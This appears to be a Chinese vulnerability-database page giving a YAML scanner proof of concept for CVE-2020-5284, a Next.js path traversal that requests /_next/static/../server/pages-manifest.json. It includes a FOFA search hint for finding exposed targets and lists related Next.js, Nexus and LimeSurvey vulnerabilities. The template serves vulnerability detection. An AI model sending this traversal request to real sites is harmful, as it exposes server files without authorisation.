CVE-2020-5284: Next.js .next limited path traversal

漏洞描述

PoC代码[已公开]

id: CVE-2020-5284

info:
    name: Next.js .next limited path traversal
    author: 不动明王
    severity: medium
    verified: true 
    description: |
        前端目录遍历浏览
        fofa "Next.js"

rules:
    r0:
        request:
            method: GET
            path: /_next/static/../server/pages-manifest.json
        expression: 'response.status == 200 && response.headers["content-type"].contains("application/json") && "/_app\": \".*?_app\\.js".bmatches(response.body)'
expression: r0()

相关漏洞推荐

• Next.js Middleware 服务器端请求伪造漏洞（CVE-2025-57822） 无POC

  2025-09-12 | Next.js Middleware
  Next.js 是一个基于 React 的开源 Web 开发框架，它通过服务器端渲染（SSR）和静态网站生成（SSG）等功能，让开发者能够轻松构建高性能、对搜索引擎友好的现代化应用程序。此漏洞的根源在...

• CVE-2025-29927: Next.js Middleware鉴权绕过漏洞 POC

  2025-09-01 | Next.js
  该漏洞源于Next.js使用中间件进行身份验证和授权的过程存在漏洞，该漏洞允许攻击者通过操作 x-middleware-subrequest 请求头来绕过基于中间件的安全控制，从而可能获得对受保护资源...

• Next.js X-Middleware-Subrequest 权限绕过漏洞（CVE-2025-29927） 无POC

  2025-08-29 | Next.js
  Next.js 是一个用于构建全栈 Web 应用程序的 React 框架。2025年3月，官方披露 CVE-2025-29927 Next.js 中间件权限绕过漏洞。如果授权检查发生在Next.js ...

• CVE-2020-10199: Nexus Repository before 3.21.2 allows JavaEL Injection POC

  2025-09-01 | Nexus Repository
  漏洞触发需要任意账户权限 body="Nexus Repository Manager" app="Nexus-Repository-Manager"

• CVE-2020-11455: LimeSurvey 4.1.11 - Path Traversal POC

  2025-09-01 | LimeSurvey
  LimeSurvey before 4.1.12+200324 contains a path traversal vulnerability in application/controllers/a...